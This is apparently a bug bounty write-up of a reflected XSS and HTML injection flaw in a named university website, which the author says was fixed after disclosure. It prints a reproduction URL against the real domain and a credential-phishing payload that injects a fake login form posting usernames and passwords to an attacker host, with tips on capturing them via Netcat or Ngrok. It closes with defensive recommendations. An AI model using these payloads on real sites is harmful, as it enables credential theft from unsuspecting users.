Cracking the Code: XSS Exploits and Their Power in Phishing Warfare
Dear colleagues,
I'm Hacker Halt, a Bug Bounty Hunter in the cybersecurity field. Recently, I discovered a big problem in Baqai Medical University's website: a vulnerability called XSS (Cross-Site Scripting) and HTML injection in its GET parameter.
Today, I'll explain how I found and fixed this issue, which is essential for strengthening web security and earning recognition in bug bounty programs. Baqai Medical University was randomly chosen for assessment, and they've fixed the problem since I alerted them.
Methodology:
- Subdomains Analysis: I used tools like Gobuster to find hidden parts of the website.
- Discovery of Hidden Directories: By checking lists like SecLists, I found hidden directories to investigate.
- Identification of Vulnerable Parameters: I closely looked at URL parameters and found where bad code could get in.
- Exploitation and Enumeration: With the vulnerability in mind, I created ways to exploit it.
Summary
This vulnerability allows bad actors to inject harmful code into the website, leading to data theft or session hijacking. Even a simple script like displaying a popup could be executed, showing the vulnerability’s severity.
To reproduce the vulnerability, one can visit the following URLs:
https://www.baqai.edu.pk/BMU-QEC.php?page=%3Cscript%3Ealert(%22Join%20Hacker%20Halt%22)%3C/script%3E
We Clearly See That The Simple Xss Payloads is Easy to Execute. lets convert this Reflected XSS into The Phishing Attack.
Payload For The Phishing is
A simple form was created to steal user credentials, highlighting the danger of this vulnerability.
document.write('<h3>Please login to continue</h3><form action=http://192.168.196.92><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
Change the Local Host to Your Own System Ip Address or Using The Ngrok Technique.
Response
Here The user Credentials Username and Passwords (hackerhalt:1234567) using the Netcat Tool.
Impact:
Combining XSS with phishing can be devastating, allowing attackers to steal data or trick users into revealing sensitive information, leading to identity theft or financial loss.
Recommendations:
To prevent such attacks, organizations should:
- Validate and sanitize user input.
- Encode website output to prevent script execution.
- Regularly audit website security.
- Educate users about phishing risks.
- Enforce Content Security Policy and Multi-Factor Authentication.
- Monitor web traffic and keep software up to date.
Following these steps can greatly reduce the risks of XSS and phishing attacks.
Submitted by: Abhishek Aswal
For more insights, subscribe to my YouTube Channel: https://www.youtube.com/channel/UCCJn0QqA7Sppjr6azus09fw